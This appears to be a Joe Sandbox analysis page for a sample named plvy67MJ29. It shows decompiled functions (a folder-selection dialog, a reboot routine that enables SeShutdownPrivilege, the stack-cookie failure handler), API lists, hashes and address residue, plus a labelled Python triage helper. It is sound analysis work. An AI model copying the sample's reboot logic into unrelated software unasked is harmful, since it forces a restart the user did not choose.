                                                                                                                                                                                                    0x00fd61f8
                                                                                                                                                                                                    0x00fd61f8
                                                                                                                                                                                                    0x00fd5e50
                                                                                                                                                                                                    0x00fd5e53
                                                                                                                                                                                                    0x00fd6109
                                                                                                                                                                                                    0x00fd611f
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd6125
                                                                                                                                                                                                    0x00fd6137
                                                                                                                                                                                                    0x00fd613a
                                                                                                                                                                                                    0x00fd613c
                                                                                                                                                                                                    0x00fd613e
                                                                                                                                                                                                    0x00fd613e
                                                                                                                                                                                                    0x00fd6141
                                                                                                                                                                                                    0x00fd6141
                                                                                                                                                                                                    0x00fd6143
                                                                                                                                                                                                    0x00fd6144
                                                                                                                                                                                                    0x00fd614a
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd6150
                                                                                                                                                                                                    0x00fd6152
                                                                                                                                                                                                    0x00fd615c
                                                                                                                                                                                                    0x00fd6170
                                                                                                                                                                                                    0x00fd6172
                                                                                                                                                                                                    0x00fd617c
                                                                                                                                                                                                    0x00fd6190
                                                                                                                                                                                                    0x00fd6190
                                                                                                                                                                                                    0x00fd6196
                                                                                                                                                                                                    0x00fd61a5
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd61ab
                                                                                                                                                                                                    0x00fd61b9
                                                                                                                                                                                                    0x00fd61c6
                                                                                                                                                                                                    0x00fd61c6
                                                                                                                                                                                                    0x00fd617e
                                                                                                                                                                                                    0x00fd6180
                                                                                                                                                                                                    0x00fd618a
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd618a
                                                                                                                                                                                                    0x00fd615e
                                                                                                                                                                                                    0x00fd6160
                                                                                                                                                                                                    0x00fd616a
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd616a
                                                                                                                                                                                                    0x00fd615c
                                                                                                                                                                                                    0x00fd614a
                                                                                                                                                                                                    0x00fd610b
                                                                                                                                                                                                    0x00fd610e
                                                                                                                                                                                                    0x00fd610e
                                                                                                                                                                                                    0x00000000
Address column (table residue from the report's disassembly/execution-graph listing; only the instruction address column survived extraction, in original order):

0x00fd5e59 0x00fd5e59 0x00fd5e5c 0x00fd604f 0x00fd6056 0x00000000 0x00fd605c 0x00fd606e 0x00fd6071 0x00fd6073
0x00fd6075 0x00fd6075 0x00fd6078 0x00fd6078 0x00fd607a 0x00fd607b 0x00fd6081 0x00000000 0x00fd6087 0x00fd6087
0x00fd608d 0x00fd609c 0x00000000 0x00fd60a2 0x00fd60aa 0x00fd60b2 0x00fd60b7 0x00fd60bd 0x00fd60bf 0x00fd60bf
0x00fd60d6 0x00fd60e0 0x00fd60e7 0x00fd60f5 0x00000000 0x00000000 0x00000000 0x00000000 0x00fd60f5 0x00fd609c
0x00fd6081 0x00fd5e62 0x00fd5e62 0x00fd5e65 0x00fd5fd3 0x00fd5fe9 0x00000000 0x00fd5fef 0x00fd5fef 0x00fd5ff7
0x00fd5ffd 0x00fd6003 0x00fd6006 0x00fd6011 0x00fd6014 0x00fd603d 0x00fd6016 0x00fd6018 0x00fd6019 0x00fd601b
0x00fd6033 0x00fd601d 0x00fd6020 0x00fd6029 0x00fd6022 0x00fd6022 0x00fd6022 0x00fd6020 0x00fd601b 0x00fd6042
0x00fd6044 0x00fd6046 0x00fd604a 0x00fd5ff7 0x00fd5fd5 0x00fd5fd8 0x00fd5fd8 0x00000000 0x00fd5e6b 0x00fd5e6b
0x00fd5e6e 0x00fd5f8b 0x00fd5f99 0x00000000 0x00fd5f9f 0x00fd5fa7 0x00fd5faf 0x00000000 0x00fd5fb1 0x00fd5fb3
0x00000000 0x00fd5fb5 0x00fd5fb7 0x00000000 0x00fd5fb9 0x00000000 0x00fd5fb9 0x00fd5fb7 0x00fd5fb3 0x00fd5faf
0x00fd5f8d 0x00fd5f8d 0x00fd5f8d 0x00fd5f8f 0x00fd5fc1 0x00fd5fc1 0x00fd5fc1 0x00000000 0x00fd5e74 0x00fd5e74
0x00fd5e77 0x00fd5ea0 0x00fd5ebd 0x00fd5f79 0x00000000 0x00fd5f7f 0x00fd5ec3 0x00fd5ec3 0x00fd5ecc 0x00fd5ed4
0x00fd5ed6 0x00fd5edc 0x00fd5edf 0x00fd5eea 0x00fd5eed 0x00fd5f3f 0x00fd5f40 0x00000000 0x00fd5eef 0x00fd5eef
0x00fd5ef2 0x00fd5f34 0x00fd5ef4 0x00fd5ef4 0x00fd5ef7 0x00fd5f2b 0x00000000 0x00fd5ef9 0x00fd5ef9 0x00fd5efc
0x00fd5f22 0x00000000 0x00fd5efe 0x00fd5eff 0x00fd5f02 0x00fd5f16 0x00fd5f04 0x00fd5f07 0x00fd5f0d 0x00fd5f46
0x00fd5f46 0x00fd5f09 0x00fd5f09 0x00fd5f09 0x00fd5f07 0x00fd5f02 0x00fd5efc 0x00fd5ef7 0x00fd5ef2 0x00fd5f4c
0x00fd5f4e 0x00fd5f50 0x00fd5f54 0x00fd5ed4 0x00fd5ea2 0x00fd5ea4 0x00fd5eaf 0x00fd5eaf 0x00000000 0x00fd5e79
0x00fd5e7d 0x00000000 0x00fd5e83 0x00fd5e83 0x00fd5e83
                                                                                                                                                                                                    0x00fd5e85
                                                                                                                                                                                                    0x00fd5e85
                                                                                                                                                                                                    0x00fd5e8e
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd5e94
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd5e94
                                                                                                                                                                                                    0x00fd5e8e
                                                                                                                                                                                                    0x00fd5e7d
                                                                                                                                                                                                    0x00fd5e77
                                                                                                                                                                                                    0x00fd5e6e
                                                                                                                                                                                                    0x00fd5e65
                                                                                                                                                                                                    0x00fd5e5c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd5dd0
                                                                                                                                                                                                    0x00fd5dd0
                                                                                                                                                                                                    0x00fd5dd0
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd5dd0
                                                                                                                                                                                                    0x00fd5dce
                                                                                                                                                                                                    0x00fd5dca
                                                                                                                                                                                                    0x00fd5dba
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd5d00
                                                                                                                                                                                                    0x00fd5dd9
                                                                                                                                                                                                    0x00fd5e04
                                                                                                                                                                                                    0x00fd61fe
                                                                                                                                                                                                    0x00fd5e0a
                                                                                                                                                                                                    0x00fd5e0c
                                                                                                                                                                                                    0x00fd5e17
                                                                                                                                                                                                    0x00fd5e17
                                                                                                                                                                                                    0x00fd5e04
                                                                                                                                                                                                    0x00fd6200
                                                                                                                                                                                                    0x00fd6200
                                                                                                                                                                                                    0x00000000

APIs
• CharNextA.USER32(?,00000000,?,?), ref: 00FD5CEE
• GetModuleFileNameA.KERNEL32(00FD8B3E,00000104,00000000,?,?), ref: 00FD5DFC
• CharUpperA.USER32(?), ref: 00FD5E3E
• CharUpperA.USER32(-00000052), ref: 00FD5EE1
• CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 00FD5F6F
• CharUpperA.USER32(?), ref: 00FD5FA7
• CharUpperA.USER32(-0000004E), ref: 00FD6008
• CharUpperA.USER32(?), ref: 00FD60AA
• CloseHandle.KERNEL32(00000000,00FD1140,00000000,00000040,00000000), ref: 00FD61F1
• ExitProcess.KERNEL32 ref: 00FD61F8
Strings
Memory Dump Source
• Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
Similarity
• API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
• String ID: "$"$:$RegServer
• API String ID: 1203814774-25366791
• Opcode ID: 212931d2f9f47649a0a24e5d9f2efa47706868148a06d7d62ae4fe9f4b5ab972
• Instruction ID: 2ba524ba330a1a180a470d21c1197787746a72a3777aab16757b31cd1aedf46b
• Opcode Fuzzy Hash: 212931d2f9f47649a0a24e5d9f2efa47706868148a06d7d62ae4fe9f4b5ab972
• Instruction Fuzzy Hash: E0D17F72E08A495EDF359B388C487B93B63A755B60F1C01A7C486DB391D6748E82BF50
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 60%
E00FD1F90(signed int __ecx, void* __edi, void* __esi) {
	signed int _v8;
	int _v12;
	struct _TOKEN_PRIVILEGES _v24;
	void* _v28;
	void* __ebx;
	signed int _t13;
	int _t21;
	void* _t25;
	int _t28;
	signed char _t30;
	void* _t38;
	void* _t40;
	void* _t41;
	signed int _t46;

	_t41 = __esi;
	_t38 = __edi;
	_t30 = __ecx;
	if((__ecx & 0x00000002) != 0) {
		L12:
		if((_t30 & 0x00000004) != 0) {
			L14:
			if( *0xfd9a40 != 0) {
				_pop(_t30);
				_t44 = _t46;
				_t13 =  *0xfd8004; // 0x42de454f
				_v8 = _t13 ^ _t46;
				_push(_t38);
				if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
					LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
					_v24.PrivilegeCount = 1;
					_v12 = 2;
					_t21 = AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0);
					CloseHandle(_v28);
					_t41 = _t41;
					_push(0);
					if(_t21 != 0) {
						if(ExitWindowsEx(2, ??) != 0) {
							_t25 = 1;
						} else {
							_t37 = 0x4f7;
							goto L3;
						}
					} else {
						_t37 = 0x4f6;
						goto L4;
					}
				} else {
					_t37 = 0x4f5;
					L3:
					_push(0);
					L4:
					_push(0x10);
					_push(0);
					_push(0);
					E00FD44B9(0, _t37);
					_t25 = 0;
				}
				_pop(_t40);
				return E00FD6CE0(_t25, _t30, _v8 ^ _t44, _t37, _t40, _t41);
			} else {
				_t28 = ExitWindowsEx(2, 0);
				goto L16;
			}
		} else {
			_t37 = 0x522;
			_t28 = E00FD44B9(0, 0x522, 0xfd1140, 0, 0x40, 4);
			if(_t28 != 6) {
				goto L16;
			} else {
				goto L14;
			}
		}
	} else {
		__eax = E00FD1EA7(__ecx);
                                                                                                                                                                                                    					if(__eax != 2) {
                                                                                                                                                                                                    						L16:
                                                                                                                                                                                                    						return _t28;
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						goto L12;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    			}

Disassembly listing: only the address column (0x00fd1ee5 .. 0x00fd1fdb) survived extraction; the instruction text is not present.


                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000028,?,?), ref: 00FD1EFB
                                                                                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 00FD1F02
                                                                                                                                                                                                    • ExitWindowsEx.USER32(00000002,00000000), ref: 00FD1FD3
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Process$CurrentExitOpenTokenWindows
                                                                                                                                                                                                    • String ID: SeShutdownPrivilege
                                                                                                                                                                                                    • API String ID: 2795981589-3733053543
                                                                                                                                                                                                    • Opcode ID: eb2fb379beba198615759bb74cd7f4ff9775f76f2d31d1f1017810babbbbedd6
                                                                                                                                                                                                    • Instruction ID: 11784b64c918c74275dfa32ab53a4c295e0334e048723db86d7bfc38e0d95301
                                                                                                                                                                                                    • Opcode Fuzzy Hash: eb2fb379beba198615759bb74cd7f4ff9775f76f2d31d1f1017810babbbbedd6
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0D219671A412097BDB205BA1DC4AF7F77BBFB85720F18001BFA05D6281D7758841B665
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 100%
			E00FD6CF0(struct _EXCEPTION_POINTERS* _a4) {
				// MSVC CRT security-cookie failure path (__report_gsfailure / __raise_securityfailure):
				// remove any user-installed filter, run the default unhandled-exception filter on the
				// prepared exception record, then terminate with 0xC0000409 == STATUS_STACK_BUFFER_OVERRUN.
				// This is compiler runtime code rather than sample-specific logic.
				SetUnhandledExceptionFilter(0);
				UnhandledExceptionFilter(_a4);
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}


Disassembly listing: only the address column (0x00fd6cf7 .. 0x00fd6d19) survived extraction; the instruction text is not present.


                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00FD6E26,00FD1000), ref: 00FD6CF7
                                                                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(00FD6E26,?,00FD6E26,00FD1000), ref: 00FD6D00
                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(C0000409,?,00FD6E26,00FD1000), ref: 00FD6D0B
                                                                                                                                                                                                    • TerminateProcess.KERNEL32(00000000,?,00FD6E26,00FD1000), ref: 00FD6D12
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3231755760-0
                                                                                                                                                                                                    • Opcode ID: 19952feffc3a3707b326e854e12890295de13b84a58fd749462a48850c9e69b1
                                                                                                                                                                                                    • Instruction ID: 18e57fdcd18af424ee4351465468428fdb12ca86650fdb64123b89150c40c466
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 19952feffc3a3707b326e854e12890295de13b84a58fd749462a48850c9e69b1
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 43D0C93200110CFBDB002BF1EC0CA593F2AEB48216F444002F31982021CA324451AF5A
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%
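
Added triage example (not part of the Joe Sandbox report and not code from the sample): a small Python helper that parses the report's "APIs" lines in the format used above and tags the two call patterns visible in the last two functions, the SeShutdownPrivilege + ExitWindowsEx(EWX_REBOOT) reboot path and the MSVC /GS cookie-failure handler that ends in TerminateProcess(0xC0000409). The sample input is the two APIs lists copied from this page; EWX_REBOOT, TOKEN_ADJUST_PRIVILEGES, TOKEN_QUERY and STATUS_STACK_BUFFER_OVERRUN are Windows SDK constants, and the finding labels are names chosen for this example.

```python
"""Added triage helper: parse Joe Sandbox 'APIs' lines and tag known call patterns."""
import re
from dataclasses import dataclass
from typing import List, Optional, Sequence, Tuple

# One entry of the report's "APIs" list, e.g.
#   • ExitWindowsEx.USER32(00000002,00000000), ref: 00FD1FD3
API_LINE = re.compile(
    r"^\s*(?:•\s*)?(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Windows SDK constants (assumed from the SDK, not taken from the report).
EWX_REBOOT = 0x00000002
TOKEN_ADJUST_PRIVILEGES = 0x00000020
TOKEN_QUERY = 0x00000008
STATUS_STACK_BUFFER_OVERRUN = 0xC0000409   # exit code of the MSVC /GS failure path

# Constructed input for this example: the two "APIs" lists copied from the report above.
REBOOT_APIS = """\
APIs
• GetCurrentProcess.KERNEL32(00000028,?,?), ref: 00FD1EFB
• OpenProcessToken.ADVAPI32(00000000), ref: 00FD1F02
• ExitWindowsEx.USER32(00000002,00000000), ref: 00FD1FD3
"""
GS_FAILURE_APIS = """\
APIs
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,00FD6E26,00FD1000), ref: 00FD6CF7
• UnhandledExceptionFilter.KERNEL32(00FD6E26,?,00FD6E26,00FD1000), ref: 00FD6D00
• GetCurrentProcess.KERNEL32(C0000409,?,00FD6E26,00FD1000), ref: 00FD6D0B
• TerminateProcess.KERNEL32(00000000,?,00FD6E26,00FD1000), ref: 00FD6D12
"""


@dataclass(frozen=True)
class ApiCall:
    api: str
    module: str
    args: Tuple[str, ...]   # raw argument text; "?" means the sandbox could not recover it
    ref: int                # address of the call site


def parse_api_lines(text: str) -> List[ApiCall]:
    """Parse every 'Name.MODULE(args), ref: addr' line; headings and other text are skipped."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        raw = m.group("args").strip()
        args = tuple(a.strip() for a in raw.split(",")) if raw else ()
        calls.append(ApiCall(m.group("api"), m.group("module"), args, int(m.group("ref"), 16)))
    return calls


def as_int(arg: str) -> Optional[int]:
    """Hex argument text to int; None for '?' or anything else unrecoverable."""
    try:
        return int(arg, 16)
    except ValueError:
        return None


def classify(calls: Sequence[ApiCall], strings: Sequence[str] = ()) -> List[str]:
    """Return finding labels (names chosen for this example) for the patterns seen above."""
    findings = []
    names = {c.api for c in calls}
    # The argument columns are a stack snapshot, so a constant pushed for a later call shows
    # up on an earlier, nested one: 0x28 (the OpenProcessToken access mask) is printed on the
    # GetCurrentProcess line, and so is C0000409 (the TerminateProcess exit code) in the
    # second list. Collect recovered values across all calls rather than per call.
    values = {v for c in calls for v in map(as_int, c.args) if v is not None}

    # MSVC CRT __report_gsfailure: drop the user filter, run the default one, exit with
    # STATUS_STACK_BUFFER_OVERRUN. Compiler runtime code, not sample logic.
    if ({"SetUnhandledExceptionFilter", "UnhandledExceptionFilter", "TerminateProcess"} <= names
            and STATUS_STACK_BUFFER_OVERRUN in values):
        findings.append("msvc-gs-cookie-failure-handler")

    # Reboot path: own token opened for privilege adjustment, SeShutdownPrivilege referenced,
    # ExitWindowsEx called with EWX_REBOOT set in uFlags.
    reboot_calls = [c for c in calls if c.api == "ExitWindowsEx"
                    and c.args and (as_int(c.args[0]) or 0) & EWX_REBOOT]
    if (reboot_calls and "OpenProcessToken" in names
            and (TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY) in values
            and "SeShutdownPrivilege" in strings):
        findings.append("reboot-with-shutdown-privilege")
    return findings


if __name__ == "__main__":
    for label, text, strs in (("reboot function", REBOOT_APIS, ["SeShutdownPrivilege"]),
                              ("E00FD6CF0", GS_FAILURE_APIS, [])):
        calls = parse_api_lines(text)
        print(label, [c.api for c in calls], classify(calls, strs))
```

AdjustTokenPrivileges does not appear in the first list, so the reboot rule keys on the token access mask and the SeShutdownPrivilege string (the report's String ID) instead of on that call; the second rule lets an analyst skip E00FD6CF0 as CRT code and spend time on the functions that actually belong to the sample.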

                                                                                                                                                                                                    C-Code - Quality: 76%
                                                                                                                                                                                                    			E00FD3210(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* _t6;
                                                                                                                                                                                                    				void* _t10;
                                                                                                                                                                                                    				int _t20;
                                                                                                                                                                                                    				int _t21;
                                                                                                                                                                                                    				int _t23;
                                                                                                                                                                                                    				char _t24;
                                                                                                                                                                                                    				long _t25;
                                                                                                                                                                                                    				int _t27;
                                                                                                                                                                                                    				int _t30;
                                                                                                                                                                                                    				void* _t32;
                                                                                                                                                                                                    				int _t33;
                                                                                                                                                                                                    				int _t34;
                                                                                                                                                                                                    				int _t37;
                                                                                                                                                                                                    				int _t38;
                                                                                                                                                                                                    				int _t39;
                                                                                                                                                                                                    				void* _t42;
                                                                                                                                                                                                    				void* _t46;
                                                                                                                                                                                                    				CHAR* _t49;
                                                                                                                                                                                                    				void* _t58;
                                                                                                                                                                                                    				void* _t63;
                                                                                                                                                                                                    				struct HWND__* _t64;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t64 = _a4;
                                                                                                                                                                                                    				_t6 = _a8 - 0x10;
                                                                                                                                                                                                    				if(_t6 == 0) {
                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                    					L38:
                                                                                                                                                                                                    					EndDialog(_t64, ??);
                                                                                                                                                                                                    					L39:
                                                                                                                                                                                                    					__eflags = 1;
                                                                                                                                                                                                    					return 1;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t42 = 1;
                                                                                                                                                                                                    				_t10 = _t6 - 0x100;
                                                                                                                                                                                                    				if(_t10 == 0) {
                                                                                                                                                                                                    					E00FD43D0(_t64, GetDesktopWindow());
                                                                                                                                                                                                    					SetWindowTextA(_t64, "nst0dum");
                                                                                                                                                                                                    					SendDlgItemMessageA(_t64, 0x835, 0xc5, 0x103, 0);
                                                                                                                                                                                                    					__eflags =  *0xfd9a40 - _t42; // 0x3
                                                                                                                                                                                                    					if(__eflags == 0) {
                                                                                                                                                                                                    						EnableWindow(GetDlgItem(_t64, 0x836), 0);
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					L36:
                                                                                                                                                                                                    					return _t42;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				if(_t10 == _t42) {
                                                                                                                                                                                                    					_t20 = _a12 - 1;
                                                                                                                                                                                                    					__eflags = _t20;
                                                                                                                                                                                                    					if(_t20 == 0) {
                                                                                                                                                                                                    						_t21 = GetDlgItemTextA(_t64, 0x835, 0xfd91e4, 0x104);
                                                                                                                                                                                                    						__eflags = _t21;
                                                                                                                                                                                                    						if(_t21 == 0) {
                                                                                                                                                                                                    							L32:
                                                                                                                                                                                                    							_t58 = 0x4bf;
                                                                                                                                                                                                    							_push(0);
                                                                                                                                                                                                    							_push(0x10);
                                                                                                                                                                                                    							_push(0);
                                                                                                                                                                                                    							_push(0);
                                                                                                                                                                                                    							L25:
                                                                                                                                                                                                    							E00FD44B9(_t64, _t58);
                                                                                                                                                                                                    							goto L39;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t49 = 0xfd91e4;
                                                                                                                                                                                                    						do {
                                                                                                                                                                                                    							_t23 =  *_t49;
                                                                                                                                                                                                    							_t49 =  &(_t49[1]);
                                                                                                                                                                                                    							__eflags = _t23;
                                                                                                                                                                                                    						} while (_t23 != 0);
                                                                                                                                                                                                    						__eflags = _t49 - 0xfd91e5 - 3;
                                                                                                                                                                                                    						if(_t49 - 0xfd91e5 < 3) {
                                                                                                                                                                                                    							goto L32;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t24 =  *0xfd91e5; // 0x3a
                                                                                                                                                                                                    						__eflags = _t24 - 0x3a;
                                                                                                                                                                                                    						if(_t24 == 0x3a) {
                                                                                                                                                                                                    							L21:
                                                                                                                                                                                                    							_t25 = GetFileAttributesA(0xfd91e4);
                                                                                                                                                                                                    							__eflags = _t25 - 0xffffffff;
                                                                                                                                                                                                    							if(_t25 != 0xffffffff) {
                                                                                                                                                                                                    								L26:
                                                                                                                                                                                                    								E00FD658A(0xfd91e4, 0x104, 0xfd1140);
                                                                                                                                                                                                    								_t27 = E00FD58C8(0xfd91e4);
                                                                                                                                                                                                    								__eflags = _t27;
                                                                                                                                                                                                    								if(_t27 != 0) {
                                                                                                                                                                                                    									__eflags =  *0xfd91e4 - 0x5c;
                                                                                                                                                                                                    									if( *0xfd91e4 != 0x5c) {
                                                                                                                                                                                                    										L30:
                                                                                                                                                                                                    										_t30 = E00FD597D(0xfd91e4, 1, _t64, 1);
                                                                                                                                                                                                    										__eflags = _t30;
                                                                                                                                                                                                    										if(_t30 == 0) {
                                                                                                                                                                                                    											L35:
                                                                                                                                                                                                    											_t42 = 1;
                                                                                                                                                                                                    											__eflags = 1;
                                                                                                                                                                                                    											goto L36;
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    										L31:
                                                                                                                                                                                                    										_t42 = 1;
                                                                                                                                                                                                    										EndDialog(_t64, 1);
                                                                                                                                                                                                    										goto L36;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									__eflags =  *0xfd91e5 - 0x5c;
                                                                                                                                                                                                    									if( *0xfd91e5 == 0x5c) {
                                                                                                                                                                                                    										goto L31;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									goto L30;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								_push(0);
                                                                                                                                                                                                    								_push(0x10);
                                                                                                                                                                                                    								_push(0);
                                                                                                                                                                                                    								_push(0);
                                                                                                                                                                                                    								_t58 = 0x4be;
                                                                                                                                                                                                    								goto L25;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_t32 = E00FD44B9(_t64, 0x54a, 0xfd91e4, 0, 0x20, 4);
                                                                                                                                                                                                    							__eflags = _t32 - 6;
                                                                                                                                                                                                    							if(_t32 != 6) {
                                                                                                                                                                                                    								goto L35;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_t33 = CreateDirectoryA(0xfd91e4, 0);
                                                                                                                                                                                                    							__eflags = _t33;
                                                                                                                                                                                                    							if(_t33 != 0) {
                                                                                                                                                                                                    								goto L26;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_push(0);
                                                                                                                                                                                                    							_push(0x10);
                                                                                                                                                                                                    							_push(0);
                                                                                                                                                                                                    							_push(0xfd91e4);
                                                                                                                                                                                                    							_t58 = 0x4cb;
                                                                                                                                                                                                    							goto L25;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						__eflags =  *0xfd91e4 - 0x5c;
                                                                                                                                                                                                    						if( *0xfd91e4 != 0x5c) {
                                                                                                                                                                                                    							goto L32;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						__eflags = _t24 - 0x5c;
						if(_t24 != 0x5c) {
							goto L32;
						}
						goto L21;
					}
					_t34 = _t20 - 1;
					__eflags = _t34;
					if(_t34 == 0) {
						EndDialog(_t64, 0);
						 *0xfd9124 = 0x800704c7;
						goto L39;
					}
					__eflags = _t34 != 0x834;
					if(_t34 != 0x834) {
						goto L36;
					}
					_t37 = LoadStringA( *0xfd9a3c, 0x3e8, 0xfd8598, 0x200);
					__eflags = _t37;
					if(_t37 != 0) {
						_t38 = E00FD4224(_t64, _t46, _t46);
						__eflags = _t38;
						if(_t38 == 0) {
							goto L36;
						}
						_t39 = SetDlgItemTextA(_t64, 0x835, 0xfd87a0);
						__eflags = _t39;
						if(_t39 != 0) {
							goto L36;
						}
						_t63 = 0x4c0;
						L9:
						E00FD44B9(_t64, _t63, 0, 0, 0x10, 0);
						_push(0);
						goto L38;
					}
					_t63 = 0x4b1;
					goto L9;
				}
				return 0;
			}
                                                                                                                                                                                                    0x00fd321b
                                                                                                                                                                                                    0x00fd321e
                                                                                                                                                                                                    0x00fd3221
                                                                                                                                                                                                    0x00fd343c
                                                                                                                                                                                                    0x00fd343e
                                                                                                                                                                                                    0x00fd343f
                                                                                                                                                                                                    0x00fd3445
                                                                                                                                                                                                    0x00fd3447
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd3447
                                                                                                                                                                                                    0x00fd3229
                                                                                                                                                                                                    0x00fd322a
                                                                                                                                                                                                    0x00fd322f
                                                                                                                                                                                                    0x00fd33ec
                                                                                                                                                                                                    0x00fd33f7
                                                                                                                                                                                                    0x00fd3410
                                                                                                                                                                                                    0x00fd3416
                                                                                                                                                                                                    0x00fd341d
                                                                                                                                                                                                    0x00fd342d
                                                                                                                                                                                                    0x00fd342d
                                                                                                                                                                                                    0x00fd3438
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd3438
                                                                                                                                                                                                    0x00fd3237
                                                                                                                                                                                                    0x00fd3243
                                                                                                                                                                                                    0x00fd3243
                                                                                                                                                                                                    0x00fd3246
                                                                                                                                                                                                    0x00fd32ee
                                                                                                                                                                                                    0x00fd32f4
                                                                                                                                                                                                    0x00fd32f6
                                                                                                                                                                                                    0x00fd33d4
                                                                                                                                                                                                    0x00fd33d6
                                                                                                                                                                                                    0x00fd33db
                                                                                                                                                                                                    0x00fd33dc
                                                                                                                                                                                                    0x00fd33de
                                                                                                                                                                                                    0x00fd33df
                                                                                                                                                                                                    0x00fd3370
                                                                                                                                                                                                    0x00fd3372
                                                                                                                                                                                                    0x00000000
